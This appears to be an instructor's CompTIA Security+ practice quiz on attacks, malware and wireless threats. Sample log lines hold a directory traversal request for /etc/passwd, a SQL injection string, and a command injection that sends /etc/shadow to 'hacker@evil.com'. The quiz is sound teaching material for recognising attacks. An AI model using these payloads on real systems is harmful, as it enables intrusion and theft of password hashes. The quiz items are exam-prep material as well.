
Domain 1 Quiz
Domain 1 Quiz
-
Assign the attack names at right to the descriptions at left.
You use each attack name once.
Something like "Number 5 matches e", for numbers 1 through 4.
On the real exam, this will take the form of pull-down
menus by each description.
- Walking down the street, you get advertising messages from stores you are walking past
- You hear from friends that contact information they shared only with you seems to be loose on the Internet
- You receive text messages containing random advertisements
- You receive recorded phone calls that you believe are in Mandarin, a language you don't speak
- SPIM
- Bluesnarfing
- Vishing
- Bluejacking
Bluejacking = illicit and unwanted connections, "Bluetooth hijacking", pushing out advertising from the nearby store. I don't know if this is a threat in the real world, but it is in the question pool.
Bluesnarfing = an illicit Bluetooth connection stole your address book.
SPIM = Spam over Instant Messaging.
Vishing = like phishing (non-targeted) but over voice, from spoofed caller numbers. I live in West Lafayette, just down the street from Purdue University, with a large number of foreign students. I get frequent calls from a spoofed Chicago number with a recorded Chinese message with background music. I've been told they're borderline scams from immigration law firms. -
Liz is a security analyst for the IT department of a large
university with a correspondingly large number of users.
She has been investigating a sophisticated
privilege escalation attack.
She has determined that the attacker used an ordinary
user account with a rather large user ID number.
The attack changed that to a very low user ID number,
associated with a highly privileged system account.
Which of these did the attack utilize?
- Improper account configuration
- Memory leak
- Buffer overflow
- Integer overflow
- Race condition
232 - 1 = 4,294,967,295
but:
4,294,967,295 + 1 = 0
Don't know too much! That makes it hard. CompTIA is probably posing their question in a 16-bit world, if not an 8-bit one. -
You are equipping a forensics team.
Which of these would be most useful?
- A set of precision screwdrivers
- A cheap camera
- Luminol
- Latex gloves and masks
-
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305 54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /../../../etc/passwd HTTP/1.1" 200 25310 "https://www.bing.com/" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - - 66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
/etc
configuration area on a UNIX-family operating system. -
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305 54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /cgi-bin/?cmd=scp%20/etc/shadow%20hacker@evil.com HTTP/1.1" 200 25310 "https://www.bing.com/" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - - 66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
%20
is the ASCII code for a space. Notice the string:
scp%20/etc/shadow%20hacker@evil.com
which decodes to:
scp /etc/shadow hacker@evil.com
That's the syntax to usescp
to make an SSH connection as userhacker
at hostevil.com
, and copy the file/etc/shadow
(which contains the web server's user password hashes!) to that user's home directory on that remote server. -
You observe the following.
66.249.79.158 - - [01/Jul/2020:00:00:17 +0000] "GET /travel/uk/ben-nevis/ HTTP/1.1" 200 16745 "-" TLSv1.2 ECDHE-ECDSA-CHACHA20-POLY1305 54.36.148.211 - - [01/Jul/2020:00:01:30 +0000] "GET /travel/usa/new-york-internet/ HTTP/1.1" 200 80277 "-" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /database/'%20OR%201=1%20;-- HTTP/1.1" 200 25310 "https://www.bing.com/" - - 174.58.65.29 - - [01/Jul/2020:00:02:27 +0000] "GET /travel/japan/kamakura/ HTTP/1.1" 200 25310 "https://www.bing.com/" - - 66.102.9.57 - - [01/Jul/2020:00:03:52 +0000] "GET / HTTP/1.1" 200 5050 "-" - -
What type of attack has happened?- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
' OR 1=1; --'
An alternative version of this question is a description, "You notice strange punctuation marks in the log." -
You are examining web server logs, and you notice some
unusually long requests.
What type of attack has happened?
- SQL Injection
- Directory Traversal
- Buffer Overflow
- Command Injection
-
You observe the following in the results of a security scan.
What is this?
Channel SSID 1 corpnet3
6 corpnet3
6 netgear
11 corpnet3
- Evil twin
- Rogue AP
- Bluesmacking
- Watering hole
-
Last week Ann, a staff member in the Human Resources
department, did a Google search and clicked on
one of the links on the first page of results.
That took her to a strange page.
She went back, realized she had misspelled her search,
corrected that, and found what she needed.
Today she logged on to her bank site from work and
noticed some mysterious transfers from her account to
a bank in Eastern Europe.
What has happened?
- Clickjacking
- Ransomware
- Crimeware
- Extortionware
- Spyware
-
You observe the following in the results of a security scan.
What is this?
Channel SSID 1 corpnet3
6 corpnet3
6 corpnet3
11 corpnet3
- Evil twin
- Rogue AP
- Bluesmacking
- Watering hole
In case Bob hasn't remembered to tell you this part yet...
The three useful channels (in the CompTIA universe) are 1, 6, and 11. If you get a "configure this network" diagram involving wireless, carefully look all around it to see what fixed wireless is already there.
If you are configuring the only WAP, use channel 6 as it's the middle of the band and the antenna(s), always a compromise, will work best there.
If you are configuring an additional WAP, and there's already just one on either channel 1 or 11, pick the opposite end.
If there are two others, pick whichever of 1, 6, and 11 aren't yet in use. -
Shonda, a security auditor at a financial institution,
discovered an advanced attack that had stolen and
exfiltrated a great deal of sensitive information.
She searched a database for details of the attack,
but found nothing.
After a great deal of investigation and research, she
discovered that it seems to be a new vulnerability with
no available patch, and she implemented a workaround.
What did she discover?
- False-positive event
- False-negative event
- Zero-day event
- IDS failure event
- IPS failure event
-
Shari, a network engineer at a major health care facility,
has determined that when the head of the Radiology department
authenticated to the medical image database server,
the encrypted traffic was captured by an intruder.
That intruder later transmitted that information again
to access the database as the highly privileged account.
What type of attack is this?
- APT
- Rootkit
- Rogue AP
- Replay
-
Desmond, a network engineer, has been directed to set up
network security that will require a device to authenticate
itself onto the network and verify that patching and
anti-virus signatures are updated, before allowing the
user to try to authentication.
What should Desmond use?
- 802.1i
- 802.1x
- 802.1q
- 802.11i
-
Mehmet, the database administrator, has discovered that
a user has accidentally deleted an entire database table.
What went wrong?
- Misconfigured account
- Untrained user
- Inadequate input validation
- Memory leak
-
News reports tell of a major DDoS against a famous company.
Meanwhile, you receive a letter from your ISP saying that your
home computer is sending malicious Linux-sourced traffic.
But you don't own a Linux computer, in fact you don't
own any computer.
Your home electronics are limited to a smart TV
with a Blu-ray player and a DVR.
What has happened?
- Nothing, your ISP is wrong
- RAT
- BOT
- Trojan
-
Jim is a software developer.
Tina, his manager, has asked him to list software design
and development security issues to share with new
team members.
Which of these is the reason for most software
vulnerabilities?
- Improper input handling
- Inadequate error handling
- Support beyond end-of-life
- Default configurations
-
Inga, a security analyst at a government agency,
is inspecting the components of her operating system.
She had identified what looks like a compatibility driver,
but she suspects that it is being used by malware to monitor
keystrokes and steal other data.
If so, what malware technique has she discovered?
- Driver masquerading
- Shimming
- Driver refactoring
- Data flow manipulating
This is an example of CompTIA's focus on memorizing sometimes arbitrary terminology. In the real world there may be other, equally valid, terms. But to get the point on the exam, you have to pick CompTIA's preferred terminology. -
Alexandra is a White Hat penetration tester
doing a Black Box attack.
She is using software to automatically submit queries
to the search form on a web page.
What is she doing?
- Active reconnaissance
- Passive reconnaissance
- Open-source analysis
- Pivoting
-
Jermain has been trying to print a document on a nearby printer.
It is operational, from time to time it produces a print job
and someone from several offices down the hall arrives to
collect their output.
What is probably responsible?
Select two
- Bluesnarfing
- Bluesmacking
- Bluejacking
- Jamming
- Bluesniffing
-
Vladimir has written some malicious software that adds
unneeded loops, NOPs, and other ineffectual code every
time it is executed or spread to a new platform.
What technique is he using?
- Refactoring
- Shimming
- Masquerading
- Modifying
-
Peter is a security analyst at a bank.
The bank wants to extend its use of an outdated
operating system, as the alternative would require
replacing all their existing automated teller machines
built into storefronts and standalone brick kiosks.
What problem will they have to solve?
- Embedded systems
- EOL
- IoT
- Input validation
- Error handling
Exhibit with 4 items plus 20 questions
Passing = 82% of 24 = 19.7
Goal = 91% of 24 = 21.8